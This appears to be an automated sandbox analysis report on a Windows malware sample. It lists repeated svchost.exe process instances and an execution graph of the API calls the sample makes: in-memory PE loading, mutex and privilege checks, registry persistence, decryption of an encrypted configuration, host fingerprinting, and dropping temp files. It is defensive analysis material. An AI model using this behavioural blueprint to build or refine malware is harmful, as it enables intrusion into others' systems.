                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                                                                                      Start time:05:44:56
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                      Start time:05:44:59
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                                      Start time:05:45:04
                                                                                                                                                                                                                                                                                                      Start date:22/03/2023
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                      Imagebase:0xc0000
                                                                                                                                                                                                                                                                                                      File size:44520 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:13.4%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                        Signature Coverage:19%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:1846
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:39
                                                                                                                                                                                                                                                                                                        execution_graph 15771 40f1c0 15772 40f1d5 15771->15772 15773 40f2b9 15771->15773 15795 414700 15772->15795 15774 414330 12 API calls 15773->15774 15776 40f2d5 15774->15776 15779 40f2df calloc 15776->15779 15778 40f1ea 15778->15779 15780 40f1f4 15778->15780 15782 40f307 15779->15782 15783 40f30e 15779->15783 15784 40f20d calloc 15780->15784 15789 40f1f8 15780->15789 15785 40f22f 15782->15785 15786 414330 12 API calls 15783->15786 15784->15785 15802 413af0 15785->15802 15788 40f32a 15786->15788 15790 40f24b 15789->15790 15791 40f270 15789->15791 15830 414660 15790->15830 15793 414330 12 API calls 15791->15793 15793->15790 15796 414715 15795->15796 15797 40f1dd 15795->15797 15798 414752 15796->15798 15799 41472c 15796->15799 15797->15778 15813 414330 strlen 15797->15813 15798->15797 15801 414772 Sleep 15798->15801 15800 414730 Sleep 15799->15800 15800->15798 15800->15800 15801->15797 15801->15801 15834 413550 15802->15834 15804 413b03 15805 413b10 calloc 15804->15805 15806 413b07 15804->15806 15805->15806 15807 413b2f 15805->15807 15806->15789 15808 413b55 CreateSemaphoreA 15807->15808 15809 413b93 15807->15809 15810 413b84 15808->15810 15811 413bb6 GetLastError 15808->15811 15812 413b98 free 15809->15812 15810->15806 15811->15812 15812->15789 15848 40db20 15813->15848 15816 41441d 15817 41441e FindAtomA 15816->15817 15818 414433 malloc 15817->15818 15819 4144b7 15817->15819 15821 414450 AddAtomA 15818->15821 15820 4142c0 GetAtomNameA 15819->15820 15822 4144ca 15820->15822 15825 414471 15821->15825 15824 414492 ReleaseMutex CloseHandle 15822->15824 15824->15778 15850 4142c0 15825->15850 15828 41448a free 15828->15824 15829 4144ce memset 15829->15822 15829->15824 15831 414675 15830->15831 15833 40f258 15830->15833 15832 414688 Sleep 15831->15832 15831->15833 15832->15832 15832->15833 15835 413560 15834->15835 15836 4135b8 15834->15836 15837 414700 2 API calls 15835->15837 15838 414330 12 API calls 15836->15838 15839 413568 15837->15839 15838->15835 15840 413579 15839->15840 15841 413588 15839->15841 15842 414660 Sleep 15840->15842 15843 414330 12 API calls 15841->15843 15844 413581 15842->15844 15845 4135a4 15843->15845 15844->15804 15846 414660 Sleep 15845->15846 15847 4135b1 15846->15847 15847->15804 15849 40db2d memcpy CreateMutexA WaitForSingleObject 15848->15849 15849->15816 15849->15817 15851 4142d7 15850->15851 15852 4142d8 GetAtomNameA 15850->15852 15851->15852 15853 4142f0 15852->15853 15853->15828 15853->15829 15854 e60000 15864 e609fc GetPEB 15854->15864 15857 e609fc GetPEB 15861 e60281 15857->15861 15858 e609e4 15859 e60483 GetNativeSystemInfo 15859->15858 15860 e604b0 VirtualAlloc 15859->15860 15862 e604c9 15860->15862 15861->15858 15861->15859 15866 10002720 15862->15866 15865 e60275 15864->15865 15865->15857 15869 10001000 15866->15869 15872 10001030 LoadLibraryW GetProcAddress 15869->15872 15912 10001b30 15872->15912 15875 10001091 SetLastError 15908 1000102b 15875->15908 15876 100010a3 15877 10001b30 SetLastError 15876->15877 15878 100010b9 15877->15878 15879 100010f0 15878->15879 15880 100010de SetLastError 15878->15880 15878->15908 15881 10001111 15879->15881 15882 100010ff SetLastError 15879->15882 15880->15908 15883 1000111c SetLastError 15881->15883 15885 1000112e GetNativeSystemInfo 15881->15885 15882->15908 15883->15908 15886 100011bc 15885->15886 15887 100011d7 SetLastError 15886->15887 15888 100011e9 15886->15888 15887->15908 15915 10001800 VirtualAlloc 15888->15915 15889 10001202 15890 1000123d GetProcessHeap RtlAllocateHeap 15889->15890 15893 1000122e SetLastError 15889->15893 15891 10001257 SetLastError 15890->15891 15892 1000127b 15890->15892 15891->15908 15895 10001b30 SetLastError 15892->15895 15893->15908 15896 100012fb 15895->15896 15897 10001302 15896->15897 15916 10001800 VirtualAlloc 15896->15916 15987 100016c0 15897->15987 15899 10001320 15917 10001b50 15899->15917 15901 1000136b 15901->15897 15923 100021a0 15901->15923 15905 100013ca 15905->15897 15906 100013eb 15905->15906 15907 100013ff GetPEB 15906->15907 15906->15908 15944 4003b00 15907->15944 15908->15858 15913 10001070 15912->15913 15914 10001b3b SetLastError 15912->15914 15913->15875 15913->15876 15913->15908 15914->15913 15915->15889 15916->15899 15920 10001b7d 15917->15920 15918 10001b30 SetLastError 15919 10001c32 15918->15919 15921 10001be9 15919->15921 15995 10001800 VirtualAlloc 15919->15995 15920->15918 15920->15921 15921->15901 15924 100021dd IsBadHugeReadPtr 15923->15924 15934 100013b5 15923->15934 15926 10002207 15924->15926 15924->15934 15926->15934 15996 10001840 LoadLibraryA 15926->15996 15928 10002239 SetLastError 15928->15934 15929 1000224d 15998 10001a20 15929->15998 15932 10002273 SetLastError 15932->15934 15934->15897 15938 10001e80 15934->15938 15935 100023ae SetLastError 15935->15934 15936 1000229d 15936->15934 15936->15935 15941 10001eba 15938->15941 15939 10001fe5 15940 10001d10 2 API calls 15939->15940 15943 10001fc1 15940->15943 15941->15939 15941->15943 16013 10001d10 15941->16013 15943->15905 15945 4003b0d 15944->15945 16021 4002ed0 15945->16021 15947 4003b1e GetModuleFileNameA SetUnhandledExceptionFilter CoInitialize 16024 4004510 15947->16024 15949 400400a ExitProcess 15950 4003b54 15950->15949 16042 4005700 15950->16042 15954 4003b9f 16076 4009400 15954->16076 15960 4003be1 16093 4005e00 CreateMutexA GetLastError 15960->16093 15962 4003beb StrStrIA 16094 4001120 15962->16094 15973 4003c92 16142 4005b50 15973->16142 15977 4003df8 15982 4003e30 15977->15982 16182 40078d0 15977->16182 15980 4003fed Sleep 15980->15949 15980->15982 15981 4004020 184 API calls 15981->15982 15982->15980 15982->15981 15983 4003f09 15982->15983 16169 4007970 15982->16169 15983->15982 15986 4003f62 VirtualFree 15983->15986 16186 40042e0 15983->16186 16191 4004020 15983->16191 15986->15983 15988 100016d2 15987->15988 15989 100016d7 15987->15989 15988->15908 15990 100019d0 VirtualFree 15989->15990 15994 1000170b 15990->15994 15991 10001770 GetProcessHeap HeapFree 15991->15988 15993 100019d0 VirtualFree 15993->15991 15994->15991 15994->15993 15995->15921 15997 10001857 15996->15997 15997->15928 15997->15929 15999 10001a35 15998->15999 16000 10001a2c 15998->16000 16004 10001a43 15999->16004 16006 100019f0 VirtualAlloc 15999->16006 16007 10001900 16000->16007 16003 10001a51 16003->16004 16010 100019d0 16003->16010 16004->15932 16004->15936 16006->16003 16008 10001910 VirtualQuery 16007->16008 16009 1000190c 16007->16009 16008->16009 16009->15999 16011 100019d9 VirtualFree 16010->16011 16012 100019ea 16010->16012 16011->16012 16012->16004 16014 10001d29 16013->16014 16018 10001d1f 16013->16018 16015 10001d37 16014->16015 16016 10001d9d VirtualProtect 16014->16016 16015->16018 16020 10001820 VirtualFree 16015->16020 16016->16018 16018->15941 16020->16018 16214 4003090 GetPEB 16021->16214 16023 4002edf 16023->15947 16025 40047e6 16024->16025 16026 4004528 16024->16026 16025->15950 16026->16025 16027 400455b GetModuleFileNameA CreateFileA 16026->16027 16027->16025 16028 40045a4 GetFileSize 16027->16028 16029 40047d0 16028->16029 16030 40045c6 VirtualAlloc 16028->16030 16029->16025 16032 40047d9 CloseHandle 16029->16032 16030->16029 16031 40045ef ReadFile 16030->16031 16033 4004625 16031->16033 16041 400466f 16031->16041 16032->16025 16034 4004637 FindCloseChangeNotification 16033->16034 16033->16041 16215 40047f0 16034->16215 16035 40047b2 VirtualFree 16035->16029 16038 4004681 VirtualFree 16040 400469f 16038->16040 16039 40047f0 15 API calls 16039->16040 16040->16039 16040->16041 16041->16029 16041->16035 16043 4003b84 16042->16043 16044 4005717 16042->16044 16063 4005a00 16043->16063 16235 4008f80 16044->16235 16050 4005773 16304 4005cd0 16050->16304 16053 40057d1 16054 40057e6 GetAllUsersProfileDirectoryA 16053->16054 16055 40057f9 GetEnvironmentVariableA 16053->16055 16056 4005810 wnsprintfA CreateFileA 16054->16056 16055->16056 16056->16043 16057 4005867 GetFileSize 16056->16057 16058 4005886 VirtualAlloc 16057->16058 16059 4005918 CloseHandle 16057->16059 16058->16059 16060 40058ab ReadFile 16058->16060 16059->16043 16061 4005904 VirtualFree 16060->16061 16062 40058e4 16060->16062 16061->16059 16062->16059 16064 4005b44 16063->16064 16065 4005a18 16063->16065 16064->15954 16065->16064 16066 4005a3a lstrcpyA 16065->16066 16329 4005930 16066->16329 16068 4005a62 16069 4005a74 lstrlenA 16068->16069 16069->16064 16070 4005a8c lstrcpyA lstrlenA lstrlenA 16069->16070 16070->16064 16071 4005abf lstrcatA RegCreateKeyExA 16070->16071 16072 4005b16 16071->16072 16073 4005b0a RegCloseKey 16071->16073 16075 4005b25 lstrcpyA 16072->16075 16074 4005b37 lstrlenA 16073->16074 16074->16064 16075->16074 16077 4003bcf 16076->16077 16080 400941a 16076->16080 16082 40099f0 GetCurrentProcess OpenProcessToken 16077->16082 16080->16077 16081 4009502 lstrcpyA CharUpperA 16080->16081 16333 4008bb0 16080->16333 16349 4009650 16080->16349 16081->16080 16083 4009a1f GetTokenInformation 16082->16083 16088 4003bd7 16082->16088 16084 4009a50 GetTokenInformation 16083->16084 16085 4009b76 CloseHandle 16083->16085 16084->16085 16086 4009a85 CreateWellKnownSid EqualSid 16084->16086 16085->16088 16087 4009ad4 CreateWellKnownSid EqualSid 16086->16087 16086->16088 16087->16088 16089 4009b0a CreateWellKnownSid EqualSid 16087->16089 16091 4006060 GetModuleFileNameA 16088->16091 16089->16088 16090 4009b40 CreateWellKnownSid EqualSid 16089->16090 16090->16085 16090->16088 16092 4006091 16091->16092 16092->15960 16093->15962 16095 400113a 16094->16095 16109 4001289 16094->16109 16096 4001144 lstrlenA 16095->16096 16095->16109 16097 4001156 lstrlenA 16096->16097 16096->16109 16098 4001168 16097->16098 16097->16109 16099 4001177 GetAllUsersProfileDirectoryA 16098->16099 16100 400118a GetEnvironmentVariableA 16098->16100 16101 40011a1 wnsprintfA lstrcmpiA 16099->16101 16100->16101 16102 4001216 16101->16102 16103 40011db 16101->16103 16358 40097a0 GetProcessHeap RtlAllocateHeap 16102->16358 16103->16102 16104 40011e3 CopyFileA SetFileAttributesA lstrcpyA 16103->16104 16104->16102 16106 4001220 lstrcpyA lstrcpyA CreateThread 16107 40012a3 16106->16107 16106->16109 16359 40012d0 16106->16359 16108 40097c0 2 API calls 16107->16108 16108->16109 16110 4005e30 16109->16110 16111 4005e64 RegOpenKeyExA 16110->16111 16112 4005e5d 16110->16112 16113 4005e8c RegQueryValueExA 16111->16113 16114 4003c39 16111->16114 16112->16111 16115 4005edc 16113->16115 16116 4005ebc 16113->16116 16121 4006cf0 16114->16121 16117 4005f15 RegCloseKey 16115->16117 16365 4009bd0 16115->16365 16116->16115 16118 4005ece RegDeleteValueA 16116->16118 16117->16114 16118->16115 16122 4006d13 RegOpenKeyExA 16121->16122 16123 4006d0c 16121->16123 16124 4006d3a RegQueryValueExA 16122->16124 16125 4003c4d 16122->16125 16123->16122 16126 4006d70 RegDeleteValueA 16124->16126 16127 4006d84 RegCloseKey 16124->16127 16128 4005f30 16125->16128 16126->16127 16127->16125 16369 4007d20 16128->16369 16131 4005f92 16132 4005f99 RegOpenKeyExA 16131->16132 16133 4005fc1 RegQueryValueExA 16132->16133 16134 4003c58 16132->16134 16136 4005ffc 16133->16136 16139 4009b90 16134->16139 16135 4006041 RegCloseKey 16135->16134 16136->16135 16137 4009bd0 QueryPerformanceCounter 16136->16137 16138 4006020 RegSetValueExA 16137->16138 16138->16135 16140 4009ba0 QueryPerformanceCounter 16139->16140 16141 4003c71 WSAStartup 16139->16141 16140->16141 16141->15949 16141->15973 16143 4005b67 16142->16143 16144 4003dac 16142->16144 16143->16144 16145 4005b7b lstrlenA lstrlenA 16143->16145 16156 4008a70 16144->16156 16148 4005ba3 16145->16148 16146 4005be0 VirtualAlloc 16146->16144 16150 4005c09 16146->16150 16147 4005bab StrStrIA 16147->16148 16149 4005bdc 16147->16149 16148->16146 16148->16147 16149->16146 16151 4005c7f 16150->16151 16152 4005c1f StrStrIA 16150->16152 16151->16144 16154 4005c91 VirtualAlloc 16151->16154 16152->16151 16153 4005c39 lstrcpynA 16152->16153 16153->16150 16154->16144 16155 4005cad 16154->16155 16155->16144 16157 4008ba3 16156->16157 16158 4008a87 16156->16158 16157->15977 16158->16157 16159 4008ab9 CryptAcquireContextA 16158->16159 16160 4008b12 16159->16160 16161 4008add GetLastError 16159->16161 16160->16157 16164 4008b1c CryptImportKey 16160->16164 16162 4008af8 CryptAcquireContextA 16161->16162 16163 4008aef 16161->16163 16162->16160 16163->16160 16163->16162 16165 4008b41 CryptImportKey 16164->16165 16166 4008b97 CryptReleaseContext 16164->16166 16167 4008b68 CryptDecrypt CryptDestroyKey 16165->16167 16168 4008b8d CryptDestroyKey 16165->16168 16166->16157 16167->16168 16168->16166 16170 4007987 VirtualAlloc 16169->16170 16171 4007ae9 16169->16171 16170->16171 16172 40079b6 16170->16172 16171->15982 16371 400a400 16172->16371 16175 4007ad8 VirtualFree 16175->16171 16176 4008a70 9 API calls 16177 4007a15 16176->16177 16177->16175 16178 4007a20 VirtualAlloc 16177->16178 16178->16175 16180 4007a5a 16178->16180 16179 4007ad0 16179->16175 16180->16179 16181 4007a89 inet_ntoa wnsprintfA 16180->16181 16181->16180 16183 4007965 16182->16183 16185 40078e4 16182->16185 16183->15982 16184 4007927 inet_ntoa wnsprintfA 16184->16185 16185->16183 16185->16184 16187 40044fd 16186->16187 16188 40042fa VirtualAlloc 16186->16188 16187->15983 16188->16187 16189 40044a3 16188->16189 16189->16187 16378 40092e0 16189->16378 16192 40042d7 16191->16192 16193 4004034 16191->16193 16192->15983 16193->16192 16194 400405f InitializeCriticalSection CreateEventA 16193->16194 16195 400409f 16194->16195 16196 40040ab EnterCriticalSection 16195->16196 16197 40042cd DeleteCriticalSection 16195->16197 16198 40040da 16196->16198 16199 40040bb VirtualFree 16196->16199 16197->16192 16200 40040e0 TerminateThread 16198->16200 16201 40040f3 ResetEvent LeaveCriticalSection CreateThread 16198->16201 16199->16198 16200->16201 16386 40097a0 GetProcessHeap RtlAllocateHeap 16201->16386 16387 4004ac0 16201->16387 16203 400413a 16204 4004221 WaitForMultipleObjects WaitForSingleObject 16203->16204 16211 40041d5 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 16203->16211 16205 400424b 16204->16205 16206 400424f WaitForSingleObject 16204->16206 16205->16206 16207 4004273 EnterCriticalSection 16206->16207 16208 4004267 TerminateThread 16206->16208 16209 40042a2 LeaveCriticalSection 16207->16209 16210 4004283 VirtualFree 16207->16210 16208->16207 16212 40097c0 2 API calls 16209->16212 16210->16209 16211->16203 16213 40042bb 16212->16213 16213->16197 16214->16023 16216 4004807 16215->16216 16217 4004665 16215->16217 16216->16217 16218 4004814 CryptAcquireContextA 16216->16218 16217->16038 16217->16040 16217->16041 16219 4004834 GetLastError 16218->16219 16221 4004856 16218->16221 16220 4004841 CryptAcquireContextA 16219->16220 16219->16221 16220->16221 16221->16217 16222 4004a9f CryptReleaseContext 16221->16222 16223 40048be CryptCreateHash 16221->16223 16222->16217 16224 4004a90 16223->16224 16225 40048f9 CryptHashData 16223->16225 16224->16222 16226 4004a83 CryptDestroyHash 16225->16226 16227 4004919 CryptDeriveKey 16225->16227 16226->16224 16227->16226 16228 400494a CryptDecrypt CryptDestroyKey 16227->16228 16228->16226 16229 4004995 CryptCreateHash 16228->16229 16229->16226 16230 40049b7 CryptHashData 16229->16230 16231 4004a76 CryptDestroyHash 16230->16231 16232 40049da CryptGetHashParam 16230->16232 16231->16226 16232->16231 16233 4004a11 CryptGetHashParam 16232->16233 16233->16231 16234 4004a3e 16233->16234 16234->16231 16236 400572e GetModuleFileNameA 16235->16236 16237 4008f9a 16235->16237 16275 4001ca0 CreateToolhelp32Snapshot 16236->16275 16237->16236 16238 4008fed GetVersionExA 16237->16238 16239 4009005 GetSystemInfo 16238->16239 16240 4009266 16238->16240 16242 4009115 16239->16242 16243 400901c 16239->16243 16240->16236 16241 400926c lstrcatA 16240->16241 16241->16236 16246 4009174 16242->16246 16247 400912b 16242->16247 16256 4009110 16242->16256 16244 4009042 16243->16244 16245 4009025 lstrcatA 16243->16245 16249 400904b lstrcatA 16244->16249 16253 4009068 16244->16253 16245->16256 16254 40091c3 16246->16254 16255 400917d 16246->16255 16250 4009134 lstrcatA 16247->16250 16251 400914e 16247->16251 16249->16256 16250->16256 16251->16256 16257 4009157 lstrcatA 16251->16257 16253->16256 16260 40090a1 GetSystemMetrics 16253->16260 16270 4009087 lstrcatA 16253->16270 16254->16256 16266 40091d5 lstrcatA 16254->16266 16267 40091ef 16254->16267 16261 40091a0 16255->16261 16262 4009186 lstrcatA 16255->16262 16314 4009290 GetModuleHandleA GetProcAddress 16256->16314 16257->16256 16258 4009228 lstrlenA 16268 4009259 lstrlenA 16258->16268 16269 4009239 lstrcatA lstrcatA 16258->16269 16259 4009219 lstrcatA 16259->16258 16263 40090c7 GetSystemMetrics 16260->16263 16264 40090ad lstrcatA 16260->16264 16261->16256 16265 40091a9 lstrcatA 16261->16265 16262->16256 16271 40090d3 lstrcatA 16263->16271 16272 40090ed 16263->16272 16264->16256 16265->16256 16266->16256 16267->16256 16273 40091f8 lstrcatA 16267->16273 16268->16240 16269->16268 16270->16256 16271->16256 16272->16256 16274 40090f8 lstrcatA 16272->16274 16273->16256 16274->16256 16276 4001e51 16275->16276 16277 4001cc9 Process32First 16275->16277 16293 4009d20 16276->16293 16278 4001e44 CloseHandle 16277->16278 16279 4001cee GetCurrentProcessId 16277->16279 16278->16276 16280 4001d04 16279->16280 16281 4001d20 Process32Next 16280->16281 16282 4001d12 16280->16282 16281->16280 16281->16282 16282->16278 16283 4001d44 Process32First 16282->16283 16283->16278 16284 4001d5f 16283->16284 16285 4001d71 lstrlenA 16284->16285 16286 4001e29 Process32Next 16284->16286 16287 4001e27 16285->16287 16288 4001d87 lstrcpyA OpenProcess 16285->16288 16286->16278 16286->16284 16287->16278 16288->16287 16289 4001dbb EnumProcessModules 16288->16289 16290 4001e02 GetProcessImageFileNameA 16289->16290 16291 4001de5 GetModuleFileNameExA 16289->16291 16292 4001e16 FindCloseChangeNotification 16290->16292 16291->16292 16292->16287 16294 4009d37 16293->16294 16295 4009f5d 16293->16295 16294->16295 16296 4009d4b GetSystemDirectoryA 16294->16296 16295->16050 16296->16295 16297 4009da8 GetVolumeInformationA 16296->16297 16297->16295 16298 4009deb 16297->16298 16317 4009f70 16298->16317 16302 4009f50 CoTaskMemFree 16302->16295 16303 4009f0c WideCharToMultiByte lstrcpynA 16303->16302 16305 4005ce7 lstrlenA 16304->16305 16306 400579d lstrcpyA 16304->16306 16305->16306 16307 4005cfa CreateFileA 16305->16307 16306->16053 16307->16306 16308 4005d23 GetFileSize 16307->16308 16309 4005d38 VirtualAlloc 16308->16309 16310 4005d9f FindCloseChangeNotification 16308->16310 16309->16310 16311 4005d54 ReadFile 16309->16311 16310->16306 16312 4005d7b 16311->16312 16313 4005d8e VirtualFree 16311->16313 16312->16313 16313->16310 16315 4009215 16314->16315 16316 40092bd GetCurrentProcess 16314->16316 16315->16258 16315->16259 16316->16315 16318 4009f87 16317->16318 16319 4009e2d StringFromCLSID 16317->16319 16318->16319 16325 40097a0 GetProcessHeap RtlAllocateHeap 16318->16325 16319->16302 16319->16303 16321 4009fb2 16321->16319 16322 4009fc8 GetAdaptersInfo 16321->16322 16324 4009ff4 16322->16324 16326 40097c0 16324->16326 16325->16321 16327 40097c9 GetProcessHeap HeapFree 16326->16327 16328 40097dc 16326->16328 16327->16328 16328->16319 16330 40059f3 16329->16330 16331 4005949 16329->16331 16330->16068 16331->16330 16332 40059de CharUpperA 16331->16332 16332->16331 16334 4008ce7 16333->16334 16335 4008bc7 16333->16335 16334->16080 16335->16334 16336 4008be5 CryptAcquireContextA 16335->16336 16337 4008c09 GetLastError 16336->16337 16338 4008c3e 16336->16338 16339 4008c24 CryptAcquireContextA 16337->16339 16340 4008c1b 16337->16340 16338->16334 16341 4008c48 CryptCreateHash 16338->16341 16339->16338 16340->16338 16340->16339 16342 4008c63 CryptHashData 16341->16342 16343 4008cdb CryptReleaseContext 16341->16343 16344 4008cd1 CryptDestroyHash 16342->16344 16345 4008c7b CryptGetHashParam 16342->16345 16343->16334 16344->16343 16345->16344 16346 4008ca3 16345->16346 16346->16344 16347 4008cab CryptGetHashParam 16346->16347 16347->16344 16348 4008ccb 16347->16348 16348->16344 16350 4009722 16349->16350 16351 4009667 16349->16351 16350->16080 16351->16350 16352 4009685 lstrlenA 16351->16352 16356 4009699 16352->16356 16353 40096fd lstrlenA 16354 4009715 lstrlenA 16353->16354 16355 400970c 16353->16355 16354->16350 16355->16354 16356->16353 16357 40096d4 lstrcatA lstrlenA 16356->16357 16357->16356 16358->16106 16360 40012fc 16359->16360 16361 40012e6 16359->16361 16361->16360 16362 400131d RegOpenKeyExA 16361->16362 16363 4001341 lstrlenA RegSetValueExA RegCloseKey 16362->16363 16364 4001378 Sleep 16362->16364 16363->16364 16364->16361 16366 4005ef6 RegSetValueExA 16365->16366 16367 4009bda 16365->16367 16366->16117 16367->16366 16368 4009b90 QueryPerformanceCounter 16367->16368 16368->16367 16370 4005f58 lstrcpyA lstrcatA 16369->16370 16370->16131 16370->16132 16372 400a417 16371->16372 16373 40079d2 16371->16373 16372->16373 16374 400a442 RegOpenKeyExA 16372->16374 16373->16175 16373->16176 16374->16373 16375 400a466 RegQueryValueExA 16374->16375 16376 400a490 RegCloseKey 16375->16376 16377 400a48a 16375->16377 16376->16373 16377->16376 16379 40093f8 16378->16379 16380 40092fa 16378->16380 16379->16189 16380->16379 16381 4009304 GetLocalTime 16380->16381 16382 4009322 16381->16382 16382->16379 16383 4008bb0 9 API calls 16382->16383 16384 4009650 5 API calls 16382->16384 16383->16382 16385 40093c9 lstrcatA 16384->16385 16385->16382 16386->16203 16388 4004b96 16387->16388 16389 4004ad6 CoInitialize 16387->16389 16390 4004ade 16389->16390 16391 4004b80 Sleep 16390->16391 16392 4004aeb WaitForSingleObject 16390->16392 16391->16390 16392->16391 16393 4004b01 EnterCriticalSection 16392->16393 16400 4008250 16393->16400 16396 4004b50 16405 40062b0 16396->16405 16399 4004b90 CoUninitialize 16399->16388 16401 4004b37 LeaveCriticalSection 16400->16401 16404 4008267 16400->16404 16401->16391 16401->16396 16402 40082e7 StrStrA 16402->16401 16402->16404 16404->16401 16404->16402 16489 4008090 16404->16489 16406 4004b5d VirtualFree SetEvent 16405->16406 16407 40062ca 16405->16407 16406->16399 16407->16406 16408 4006427 16407->16408 16411 4006399 16407->16411 16408->16406 16409 40064ba GetEnvironmentVariableA 16408->16409 16417 40065f3 16408->16417 16412 40064e1 16409->16412 16410 40065fe 16410->16410 16414 4006410 16411->16414 16415 40063a4 VirtualAlloc 16411->16415 16511 4009730 16412->16511 16413 4006bdd 16413->16406 16585 400a360 16413->16585 16416 4001ee0 2 API calls 16414->16416 16418 400640e 16415->16418 16425 40063cc 16415->16425 16416->16418 16417->16410 16417->16413 16550 4007250 16417->16550 16418->16408 16424 4006552 WriteFile 16428 4006588 16424->16428 16429 40065dd 16424->16429 16426 40063fd VirtualFree 16425->16426 16508 4001ee0 CreateThread 16425->16508 16426->16418 16428->16429 16435 4006593 CloseHandle 16428->16435 16429->16417 16433 40065e6 CloseHandle 16429->16433 16430 4006752 16434 40069ba GetEnvironmentVariableA 16430->16434 16437 4006858 16430->16437 16438 400678e VirtualAlloc 16430->16438 16431 4006654 VirtualAlloc 16431->16430 16436 400667a 16431->16436 16433->16417 16440 40069e1 16434->16440 16515 4006c60 16435->16515 16562 40097a0 GetProcessHeap RtlAllocateHeap 16436->16562 16441 4002070 32 API calls 16437->16441 16442 4006856 16438->16442 16455 40067c6 16438->16455 16446 4009730 QueryPerformanceCounter 16440->16446 16441->16442 16449 40069a6 16442->16449 16452 4006880 16442->16452 16453 4006894 16442->16453 16447 40069f2 GetTickCount GetTempFileNameA CreateFileA 16446->16447 16451 4006a4f 16447->16451 16488 4006bbd 16447->16488 16448 4006698 CreateThread CloseHandle 16448->16430 16449->16434 16459 4006a7b VirtualAlloc 16451->16459 16460 4006b1e WriteFile 16451->16460 16566 40073c0 16452->16566 16462 400698a 16453->16462 16573 40097a0 GetProcessHeap RtlAllocateHeap 16453->16573 16454 4006842 VirtualFree 16454->16442 16455->16454 16563 4002070 16455->16563 16456 40065d8 16456->16429 16458 4006cf0 4 API calls 16456->16458 16457 40065c9 16527 40074a0 16457->16527 16458->16429 16465 4006b1c 16459->16465 16466 4006aaf 16459->16466 16460->16465 16462->16449 16574 4002510 16462->16574 16472 4006bc9 CloseHandle 16465->16472 16475 4006b59 CloseHandle 16465->16475 16480 4006ad2 WriteFile 16466->16480 16481 4006b08 VirtualFree 16466->16481 16472->16488 16473 40068aa 16476 40068e9 VirtualAlloc 16473->16476 16477 40068ca 16473->16477 16474 4006809 VirtualAlloc 16478 400683f 16474->16478 16482 4001e60 2 API calls 16475->16482 16476->16477 16479 400690f 16476->16479 16477->16462 16483 400693f CreateThread CloseHandle 16477->16483 16478->16454 16479->16477 16480->16481 16481->16465 16484 4006b72 16482->16484 16483->16462 16613 40077b0 16483->16613 16485 4006b9e 16484->16485 16486 40073c0 5 API calls 16484->16486 16484->16488 16487 4002510 8 API calls 16485->16487 16485->16488 16486->16485 16487->16488 16488->16413 16490 4008246 16489->16490 16491 40080a7 16489->16491 16490->16404 16491->16490 16492 40080c5 VirtualAlloc 16491->16492 16492->16490 16493 40080eb 16492->16493 16501 4001390 16493->16501 16495 4008204 16495->16490 16496 4008235 VirtualFree 16495->16496 16496->16490 16497 4008100 16497->16495 16498 4008a70 9 API calls 16497->16498 16499 40081dd 16498->16499 16499->16495 16500 40081e4 VirtualAlloc 16499->16500 16500->16495 16502 400139c 16501->16502 16503 40013ae 16501->16503 16502->16503 16504 40013b6 GetProcessHeap RtlAllocateHeap 16502->16504 16503->16497 16504->16503 16506 40013e4 16504->16506 16505 40014e4 GetProcessHeap HeapFree 16505->16503 16506->16505 16507 4001498 GetProcessHeap HeapFree 16506->16507 16507->16503 16509 4001f21 16508->16509 16510 4001f0a WaitForSingleObject 16508->16510 16509->16426 16510->16509 16512 40064f2 GetTickCount GetTempFileNameA CreateFileA 16511->16512 16514 4009743 